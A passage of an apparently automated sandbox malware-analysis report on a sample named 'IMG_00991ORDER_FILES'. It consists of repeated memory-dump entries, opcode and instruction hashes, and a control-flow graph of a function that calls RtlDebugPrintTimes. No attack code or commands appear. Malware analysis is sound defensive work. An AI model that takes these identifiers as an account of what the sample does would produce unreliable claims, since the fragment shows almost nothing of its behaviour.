                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ad42a09068cdbd3a98280bdf95266400ebf1d38f1d1a8c67c9ec098d8966c3e
                                                                                    • Instruction ID: 41bb539de2c2ac637b8593eecfdcbf8f4aca9a5fc20e16c17e2153922d36c134
                                                                                    • Opcode Fuzzy Hash: 7ad42a09068cdbd3a98280bdf95266400ebf1d38f1d1a8c67c9ec098d8966c3e
                                                                                    • Instruction Fuzzy Hash: 0090023560550416958071584984646405657E0301F92C456E4414554CCA68C95A6362
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c80931f672a347ec791bd10bfc45307ee74af786bfa14770da5756b1e92682d
                                                                                    • Instruction ID: 15219d31799dd687b28472d6f5e12eee6f9d240cf5dc4b553f4facd3a117d0b2
                                                                                    • Opcode Fuzzy Hash: 1c80931f672a347ec791bd10bfc45307ee74af786bfa14770da5756b1e92682d
                                                                                    • Instruction Fuzzy Hash: C090022530110806D54261584514706005A87D1345FD2C457E5414555DC679C957B133
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 743b9446a709c0cf6a110ff4c01f7f3ebc6307be8a647e5469cee1e309b2e047
                                                                                    • Instruction ID: 51a6608232b6d6b4c21a6fa7b531c7e99b211c511b9014febdce4241c7e47ceb
                                                                                    • Opcode Fuzzy Hash: 743b9446a709c0cf6a110ff4c01f7f3ebc6307be8a647e5469cee1e309b2e047
                                                                                    • Instruction Fuzzy Hash: 5590022560110906D54171584504716005B47D0241FD2C467E5014555ECA79C996B132
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6fbaf1fcc801a2babd18ec6cf6cb90797821c694aecdca72773399951773276f
                                                                                    • Instruction ID: 07d8c4e5778c38c8d8e2513ba4abb9fda6f409cdb0aa3a124267579c922a701c
                                                                                    • Opcode Fuzzy Hash: 6fbaf1fcc801a2babd18ec6cf6cb90797821c694aecdca72773399951773276f
                                                                                    • Instruction Fuzzy Hash: E490027520110806D58071584504746005647D0301F92C456E9054554EC6ADCDD97666
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c02006c03961042aaf47b1f1ef30abc2ededb2690ae4ade84d9711b3fd2f0a0
                                                                                    • Instruction ID: 2efdd7b4f935590969ed28c54a22c60ad7a087eff5e966f0837a4d405d418b74
                                                                                    • Opcode Fuzzy Hash: 3c02006c03961042aaf47b1f1ef30abc2ededb2690ae4ade84d9711b3fd2f0a0
                                                                                    • Instruction Fuzzy Hash: 6C90022520514846D54065585508B06005647D0205F92D456E5054595DC679C855B132
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23246b497aad911732e43b8927efe192b54e380faa1244c57d1484d74184111e
                                                                                    • Instruction ID: 94b55af3fa0d9b7259afcd74b92e6e34fae474e4d5fdeff98468876d613f0470
                                                                                    • Opcode Fuzzy Hash: 23246b497aad911732e43b8927efe192b54e380faa1244c57d1484d74184111e
                                                                                    • Instruction Fuzzy Hash: 1990023520210546998062585904B4E415647E1302FD2D85AE4005554CC968C8656222
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 006de2efde1624e3fbb7370c77ce837a416c99625f3987b959a0e821bff45828
                                                                                    • Instruction ID: 6dae4e1e668c7e6673abec13f67ae9aa3192dbe75a5b89a68b6a46ba535ea0d9
                                                                                    • Opcode Fuzzy Hash: 006de2efde1624e3fbb7370c77ce837a416c99625f3987b959a0e821bff45828
                                                                                    • Instruction Fuzzy Hash: 9690022D21310406D5C07158550870A005647D1202FD2D85AE4005558CC969C86D6322
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cda243b1256047642883fc7d03129060a4d3426218c2d65b5cd354415a51b6a
                                                                                    • Instruction ID: 2dc9115e1b016622ba1906671a70d3e206931f5c19fc51e3950960394d05f2b3
                                                                                    • Opcode Fuzzy Hash: 6cda243b1256047642883fc7d03129060a4d3426218c2d65b5cd354415a51b6a
                                                                                    • Instruction Fuzzy Hash: 3890023520110807D54061585608707005647D0201F92D856E4414558DD6AAC8557122
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 60fb4facbb33f224ddb70eea6d3ade3f19bd674a0a500b8f7cbc82174a2673a6
                                                                                    • Instruction ID: fdee4ab8603f73175773c3b3f3319b3634de38f0cb049647d2082e2513a25b40
                                                                                    • Opcode Fuzzy Hash: 60fb4facbb33f224ddb70eea6d3ade3f19bd674a0a500b8f7cbc82174a2673a6
                                                                                    • Instruction Fuzzy Hash: 7A90022530110407D58071585518706405697E1301F92D456E4404554CD969C85A6223
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ee7a65080be9718e3ed07f9693118c4327cb766ab41086ac3658af4d3c8b6ba
                                                                                    • Instruction ID: 6042b8097a1098b2d6f1187cce152441aa1e06bf95df97fb55114e8e76c176d3
                                                                                    • Opcode Fuzzy Hash: 8ee7a65080be9718e3ed07f9693118c4327cb766ab41086ac3658af4d3c8b6ba
                                                                                    • Instruction Fuzzy Hash: 7C90023920110806D95061585904746009747D0301F92D856E4414558DC6A8C8A5B122
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 197dd57666df2c9b4cfaeb78ca482f7fb0c5661bffe5ef9755f5435dd08ac6e7
                                                                                    • Instruction ID: 1112e6eae292e0ccb24948c6471b706f2ba697f55952cbad4cba5b09540281ed
                                                                                    • Opcode Fuzzy Hash: 197dd57666df2c9b4cfaeb78ca482f7fb0c5661bffe5ef9755f5435dd08ac6e7
                                                                                    • Instruction Fuzzy Hash: A4900225242145565985B1584504607405757E0241BD2C457E5404950CC57AD85AE622
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b2fa265a2b73ca6d0baf0797e74f5d0c469cd406ec9ed27b992f9d4bd9e9027
                                                                                    • Instruction ID: 28099b1296fe7c6db137a7847173063a6c0fce56634cf328e0f5dad151b80ab1
                                                                                    • Opcode Fuzzy Hash: 0b2fa265a2b73ca6d0baf0797e74f5d0c469cd406ec9ed27b992f9d4bd9e9027
                                                                                    • Instruction Fuzzy Hash: 6E90023524110806D58171584504706005A57D0241FD2C457E4414554EC6A9CA5ABA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05f6b95dae227050533f6957ffa1901e39b7a567c2f51b7f9b2044c1c26e895e
                                                                                    • Instruction ID: edbad1f0fa56bd1b994ed20d8b9abdfad7904dc6ee96c03e59dd4bd384bbaa77
                                                                                    • Opcode Fuzzy Hash: 05f6b95dae227050533f6957ffa1901e39b7a567c2f51b7f9b2044c1c26e895e
                                                                                    • Instruction Fuzzy Hash: 6890022520154846D58062584904B0F415647E1202FD2C45EE8146554CC969C8596722
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 367f09be5e7f75888350f6f3ef9f3398b9d4253e3cf9a745f825f34888a5f678
                                                                                    • Instruction ID: fd16ee81ca8cd419dd3570cff9fa356dfcc44e157c594053fa133c864a53ce97
                                                                                    • Opcode Fuzzy Hash: 367f09be5e7f75888350f6f3ef9f3398b9d4253e3cf9a745f825f34888a5f678
                                                                                    • Instruction Fuzzy Hash: F590022521190446D64065684D14B07005647D0303F92C55AE4144554CC969C8656522
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5787e61ce95ee916b7aa82b33726b6ad887cd56d79bdbe5493a808a4d8831420
                                                                                    • Instruction ID: 2fe76df4805464ef32bd8750ca9f20a303e4c140a62467622712593ceae9099a
                                                                                    • Opcode Fuzzy Hash: 5787e61ce95ee916b7aa82b33726b6ad887cd56d79bdbe5493a808a4d8831420
                                                                                    • Instruction Fuzzy Hash: 4790022524110C06D58071588514707005787D0601F92C456E4014554DC66AC96976B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 832ef515190a29eceec72f9dc956686acc5300549637be601d67522a65a3d4ca
                                                                                    • Instruction ID: 6d9b26e5d4a5b84494e240fcdc7fe54d062ac707995fadf0970726aff4cff26f
                                                                                    • Opcode Fuzzy Hash: 832ef515190a29eceec72f9dc956686acc5300549637be601d67522a65a3d4ca
                                                                                    • Instruction Fuzzy Hash: B690026520150807D58065584904707005647D0302F92C456E6054555ECA7DCC557136
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7cde8256855d2e0407603e6ed3e0b8f6224ac5f138f9a8fc4c048ec6dcac1120
                                                                                    • Instruction ID: de809bcdf5a90b20fe58135a80472eb855acdacfabc4901d0f65a0146b8f9d02
                                                                                    • Opcode Fuzzy Hash: 7cde8256855d2e0407603e6ed3e0b8f6224ac5f138f9a8fc4c048ec6dcac1120
                                                                                    • Instruction Fuzzy Hash: BF90026534110846D54061584514B06005687E1301F92C45AE5054554DC66DCC567127
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fc22b1d3656858abdd7092118812bbca538ee2f59620ecdda4f5171d8c817ef9
                                                                                    • Instruction ID: ed35081c4443449fe392aae01a16ea98eee43926042647eeb3b53f0afc9cfc17
                                                                                    • Opcode Fuzzy Hash: fc22b1d3656858abdd7092118812bbca538ee2f59620ecdda4f5171d8c817ef9
                                                                                    • Instruction Fuzzy Hash: 2790023520150806D5406158491470B005647D0302F92C456E5154555DC679C8557572
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a7bc3120f17cb65e8705c8818e16f2ca2d1d6d4fd5a627d82ff6eec5dda38180
                                                                                    • Instruction ID: 22576c79077fd735a89545d716538520d62721f5585ae654ef3f243e33e7f5d9
                                                                                    • Opcode Fuzzy Hash: a7bc3120f17cb65e8705c8818e16f2ca2d1d6d4fd5a627d82ff6eec5dda38180
                                                                                    • Instruction Fuzzy Hash: AD90026521110446D54461584504706009647E1201F92C457E6144554CC57DCC656126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0af56d3f4566413415dfebc8c6b954814a5de696f2daf2e975b7275795780816
                                                                                    • Instruction ID: 5460108ebccc70637776d1bd3ec172b77a7318b4202a60b697365fa11a0db276
                                                                                    • Opcode Fuzzy Hash: 0af56d3f4566413415dfebc8c6b954814a5de696f2daf2e975b7275795780816
                                                                                    • Instruction Fuzzy Hash: 4E90023520150806D54061584908747005647D0302F92C456E9154555EC6B9C8957532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ed4d7ffb9a8f3b82e635e0ef0eedcd220fd5695a1800660856e57ee4085d0be9
                                                                                    • Instruction ID: d3cd9421d2b320ba5321dea994320af4af2ac69038d536393f14da574113fef3
                                                                                    • Opcode Fuzzy Hash: ed4d7ffb9a8f3b82e635e0ef0eedcd220fd5695a1800660856e57ee4085d0be9
                                                                                    • Instruction Fuzzy Hash: 5E90022560110446458071688944A0640566BE1211B92C566E4988550DC5ADC8696666
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac9c44f360ec95b2d2ee1d089332041781ff90a5c2545c7c1ff0a1babdd37007
                                                                                    • Instruction ID: 020ed01390bb83d207600e38b4726a7a1091822ab4659a69f0b51187fde57e03
                                                                                    • Opcode Fuzzy Hash: ac9c44f360ec95b2d2ee1d089332041781ff90a5c2545c7c1ff0a1babdd37007
                                                                                    • Instruction Fuzzy Hash: 24900229211104070545A5580704607009747D5351792C466F5005550CD675C8656122
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 160f090dfb2e9fe2c7aadb061c504e58a9c43d1753dca7e1fe45cffaaa237e69
                                                                                    • Instruction ID: 9caee62f08128ddccb23d0ece2d8a99d72c7a618a6b767f9bd7c7e1b550f4640
                                                                                    • Opcode Fuzzy Hash: 160f090dfb2e9fe2c7aadb061c504e58a9c43d1753dca7e1fe45cffaaa237e69
                                                                                    • Instruction Fuzzy Hash: 5D9002A5201244964940A2588504B0A455647E0201F92C45BE5044560CC579C855A136

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 947 352aa1f0-352aa269 call 351e2330 * 2 RtlDebugPrintTimes 953 352aa41f-352aa444 call 351e24d0 * 2 call 35214b50 947->953 954 352aa26f-352aa27a 947->954 956 352aa27c-352aa289 954->956 957 352aa2a4 954->957 959 352aa28b-352aa28d 956->959 960 352aa28f-352aa295 956->960 961 352aa2a8-352aa2b4 957->961 959->960 963 352aa29b-352aa2a2 960->963 964 352aa373-352aa375 960->964 965 352aa2c1-352aa2c3 961->965 963->961 967 352aa39f-352aa3a1 964->967 968 352aa2b6-352aa2bc 965->968 969 352aa2c5-352aa2c7 965->969 970 352aa3a7-352aa3b4 967->970 971 352aa2d5-352aa2fd RtlDebugPrintTimes 967->971 973 352aa2be 968->973 974 352aa2cc-352aa2d0 968->974 969->967 975 352aa3da-352aa3e6 970->975 976 352aa3b6-352aa3c3 970->976 971->953 983 352aa303-352aa320 RtlDebugPrintTimes 971->983 973->965 978 352aa3ec-352aa3ee 974->978 982 352aa3fb-352aa3fd 975->982 980 352aa3cb-352aa3d1 976->980 981 352aa3c5-352aa3c9 976->981 978->967 984 352aa4eb-352aa4ed 980->984 985 352aa3d7 980->985 981->980 986 352aa3ff-352aa401 982->986 987 352aa3f0-352aa3f6 982->987 983->953 995 352aa326-352aa34c RtlDebugPrintTimes 983->995 988 352aa403-352aa409 984->988 985->975 986->988 989 352aa3f8 987->989 990 352aa447-352aa44b 987->990 993 352aa40b-352aa41d RtlDebugPrintTimes 988->993 994 352aa450-352aa474 RtlDebugPrintTimes 988->994 989->982 992 352aa51f-352aa521 990->992 993->953 994->953 999 352aa476-352aa493 RtlDebugPrintTimes 994->999 995->953 1000 352aa352-352aa354 995->1000 999->953 1004 352aa495-352aa4c4 RtlDebugPrintTimes 999->1004 1001 352aa356-352aa363 1000->1001 1002 352aa377-352aa38a 1000->1002 1005 352aa36b-352aa371 1001->1005 1006 352aa365-352aa369 1001->1006 1007 352aa397-352aa399 1002->1007 1004->953 1013 352aa4ca-352aa4cc 1004->1013 1005->964 1005->1002 1006->1005 1008 352aa39b-352aa39d 1007->1008 1009 352aa38c-352aa392 1007->1009 1008->967 1011 352aa3e8-352aa3ea 1009->1011 1012 352aa394 1009->1012 1011->978 1012->1007 1014 352aa4ce-352aa4db 1013->1014 1015 352aa4f2-352aa505 1013->1015 1016 352aa4dd-352aa4e1 1014->1016 1017 352aa4e3-352aa4e9 1014->1017 1018 352aa512-352aa514 1015->1018 1016->1017 1017->984 1017->1015 1019 352aa516 1018->1019 1020 352aa507-352aa50d 1018->1020 1019->986 1021 352aa51b-352aa51d 1020->1021 1022 352aa50f 1020->1022 1021->992 1022->1018
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP:
                                                                                    • API String ID: 3446177414-2466845122
                                                                                    • Opcode ID: e6a43cfcf1f6d68f9825ae42d67f4a0c85dbea07ff0ed17b899959fca92a5616
                                                                                    • Instruction ID: c61d32764613212dbc797b005f1000d0f2c9478e0e3f670fcd29dce916dd99ea
                                                                                    • Opcode Fuzzy Hash: e6a43cfcf1f6d68f9825ae42d67f4a0c85dbea07ff0ed17b899959fca92a5616
                                                                                    • Instruction Fuzzy Hash: 28A19C76A183528FD705CE28C894A1ABBE6FF88350F06452DED46DB351EBB0EC45CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
